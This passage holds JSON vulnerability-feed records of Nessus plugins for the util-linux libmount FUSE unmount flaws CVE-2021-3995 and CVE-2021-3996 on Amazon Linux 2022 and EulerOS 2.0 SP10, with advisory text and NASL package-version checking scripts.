libblkid1 / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-15T15:06:40", "description": "It is, therefore, affected by multiple vulnerabilities as referenced in the ALAS2022-2022-086 
advisory.\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. This flaw allows an unprivileged local attacker to unmount FUSE filesystems that belong to certain other users who have a UID that is a prefix of the UID of the attacker in its string form. An attacker may use this flaw to cause a denial of service to applications that use the affected filesystems. (CVE-2021-3995)\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. This flaw allows a local user on a vulnerable system to unmount other users' filesystems that are either world-writable themselves (like /tmp) or mounted in a world-writable directory. An attacker may use this flaw to cause a denial of service to applications that use the affected filesystems. (CVE-2021-3996)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-09-06T00:00:00", "type": "nessus", "title": "Amazon Linux 2022 : (ALAS2022-2022-086)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3995", "CVE-2021-3996"], "modified": "2023-10-12T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:libblkid", "p-cpe:/a:amazon:linux:libblkid-debuginfo", "p-cpe:/a:amazon:linux:libblkid-devel", "p-cpe:/a:amazon:linux:libfdisk", "p-cpe:/a:amazon:linux:libfdisk-debuginfo", "p-cpe:/a:amazon:linux:libfdisk-devel", "p-cpe:/a:amazon:linux:libmount", "p-cpe:/a:amazon:linux:libmount-debuginfo", "p-cpe:/a:amazon:linux:libmount-devel", "p-cpe:/a:amazon:linux:libsmartcols", "p-cpe:/a:amazon:linux:libsmartcols-debuginfo", "p-cpe:/a:amazon:linux:libsmartcols-devel", "p-cpe:/a:amazon:linux:libuuid", "p-cpe:/a:amazon:linux:libuuid-debuginfo", "p-cpe:/a:amazon:linux:libuuid-devel", "p-cpe:/a:amazon:linux:python3-libmount", 
"p-cpe:/a:amazon:linux:python3-libmount-debuginfo", "p-cpe:/a:amazon:linux:util-linux", "p-cpe:/a:amazon:linux:util-linux-core", "p-cpe:/a:amazon:linux:util-linux-core-debuginfo", "p-cpe:/a:amazon:linux:util-linux-debuginfo", "p-cpe:/a:amazon:linux:util-linux-debugsource", "p-cpe:/a:amazon:linux:util-linux-user", "p-cpe:/a:amazon:linux:util-linux-user-debuginfo", "p-cpe:/a:amazon:linux:uuidd", "p-cpe:/a:amazon:linux:uuidd-debuginfo", "cpe:/o:amazon:linux:2022"], "id": "AL2022_ALAS2022-2022-086.NASL", "href": "https://www.tenable.com/plugins/nessus/164755", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux 2022 Security Advisory ALAS2022-2022-086.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(164755);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/10/12\");\n\n script_cve_id(\"CVE-2021-3995\", \"CVE-2021-3996\");\n\n script_name(english:\"Amazon Linux 2022 : (ALAS2022-2022-086)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Amazon Linux 2022 host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"It is, therefore, affected by multiple vulnerabilities as referenced in the ALAS2022-2022-086 advisory.\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged\n user to unmount a FUSE filesystem. This flaw allows an unprivileged local attacker to unmount FUSE\n filesystems that belong to certain other users who have a UID that is a prefix of the UID of the attacker\n in its string form. An attacker may use this flaw to cause a denial of service to applications that use\n the affected filesystems. (CVE-2021-3995)\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged\n user to unmount a FUSE filesystem. 
This flaw allows a local user on a vulnerable system to unmount other\n users' filesystems that are either world-writable themselves (like /tmp) or mounted in a world-writable\n directory. An attacker may use this flaw to cause a denial of service to applications that use the\n affected filesystems. (CVE-2021-3996)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/AL2022/ALAS-2022-086.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2021-3995.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2021-3996.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Run 'dnf update --releasever=2022.0.20220518 util-linux' to update your system.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:S/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3996\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/05/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/06/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/09/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libblkid\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libblkid-debuginfo\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libblkid-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libfdisk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libfdisk-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libfdisk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libmount\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libmount-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libmount-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libsmartcols\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libsmartcols-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libsmartcols-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libuuid\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libuuid-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libuuid-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:python3-libmount\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:python3-libmount-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:util-linux\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:util-linux-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:util-linux-core-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:util-linux-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:util-linux-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:util-linux-user\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:amazon:linux:util-linux-user-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:uuidd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:uuidd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux:2022\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar release = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nvar os_ver = pregmatch(pattern: \"^AL(A|\\d+|-\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nvar os_ver = os_ver[1];\nif (os_ver != \"-2022\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux 2022\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar pkgs = [\n {'reference':'libblkid-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libblkid-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libblkid-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libblkid-debuginfo-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libblkid-debuginfo-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n 
{'reference':'libblkid-debuginfo-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libblkid-devel-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libblkid-devel-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libblkid-devel-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libfdisk-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libfdisk-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libfdisk-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libfdisk-debuginfo-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libfdisk-debuginfo-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libfdisk-debuginfo-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libfdisk-devel-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libfdisk-devel-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libfdisk-devel-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libmount-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libmount-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libmount-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libmount-debuginfo-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libmount-debuginfo-2.37.4-1.amzn2022', 
'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libmount-debuginfo-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libmount-devel-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libmount-devel-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libmount-devel-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols-debuginfo-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols-debuginfo-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols-debuginfo-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols-devel-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols-devel-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols-devel-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libuuid-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libuuid-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libuuid-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libuuid-debuginfo-2.37.4-1.amzn2022', 'cpu':'aarch64', 
'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libuuid-debuginfo-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libuuid-debuginfo-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libuuid-devel-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libuuid-devel-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libuuid-devel-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'python3-libmount-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'python3-libmount-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'python3-libmount-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'python3-libmount-debuginfo-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'python3-libmount-debuginfo-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'python3-libmount-debuginfo-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-core-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-core-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-core-2.37.4-1.amzn2022', 'cpu':'x86_64', 
'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-core-debuginfo-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-core-debuginfo-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-core-debuginfo-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-debuginfo-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-debuginfo-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-debuginfo-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-debugsource-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-debugsource-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-debugsource-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-user-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-user-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-user-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-user-debuginfo-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-user-debuginfo-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-user-debuginfo-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'uuidd-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n 
{'reference':'uuidd-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'uuidd-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'uuidd-debuginfo-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'uuidd-debuginfo-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'uuidd-debuginfo-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var sp = NULL;\n var cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference && release && (!exists_check || rpm_exists(release:release, rpm:exists_check))) {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n 
exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libblkid / libblkid-debuginfo / libblkid-devel / etc\");\n}", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-01T15:22:05", "description": "According to the versions of the util-linux packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities :\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. This flaw allows a local user on a vulnerable system to unmount other users' filesystems that are either world-writable themselves (like /tmp) or mounted in a world-writable directory. An attacker may use this flaw to cause a denial of service to applications that use the affected filesystems. (CVE-2021-3996)\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. This flaw allows an unprivileged local attacker to unmount FUSE filesystems that belong to certain other users who have a UID that is a prefix of the UID of the attacker in its string form. An attacker may use this flaw to cause a denial of service to applications that use the affected filesystems. (CVE-2021-3995)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2022-05-06T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP10 : util-linux (EulerOS-SA-2022-1668)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3995", "CVE-2021-3996"], "modified": "2023-10-30T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:libblkid", "p-cpe:/a:huawei:euleros:libfdisk", "p-cpe:/a:huawei:euleros:libmount", "p-cpe:/a:huawei:euleros:libsmartcols", "p-cpe:/a:huawei:euleros:libuuid", "p-cpe:/a:huawei:euleros:util-linux", "p-cpe:/a:huawei:euleros:util-linux-user", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2022-1668.NASL", "href": "https://www.tenable.com/plugins/nessus/160658", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(160658);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/10/30\");\n\n script_cve_id(\"CVE-2021-3995\", \"CVE-2021-3996\");\n\n script_name(english:\"EulerOS 2.0 SP10 : util-linux (EulerOS-SA-2022-1668)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the util-linux packages installed, the EulerOS installation on the remote host is affected\nby the following vulnerabilities :\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged\n user to unmount a FUSE filesystem. This flaw allows a local user on a vulnerable system to unmount other\n users' filesystems that are either world-writable themselves (like /tmp) or mounted in a world-writable\n directory. An attacker may use this flaw to cause a denial of service to applications that use the\n affected filesystems. 
(CVE-2021-3996)\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged\n user to unmount a FUSE filesystem. This flaw allows an unprivileged local attacker to unmount FUSE\n filesystems that belong to certain other users who have a UID that is a prefix of the UID of the attacker\n in its string form. An attacker may use this flaw to cause a denial of service to applications that use\n the affected filesystems. (CVE-2021-3995)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security\nadvisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional\nissues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2022-1668\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f293e501\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected util-linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:S/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3996\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/05/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/05/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/05/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libblkid\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libfdisk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libmount\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libsmartcols\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libuuid\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:util-linux\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:util-linux-user\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar release = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nvar uvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP10\");\n\nvar sp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(10)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP10\");\n\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP10\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) 
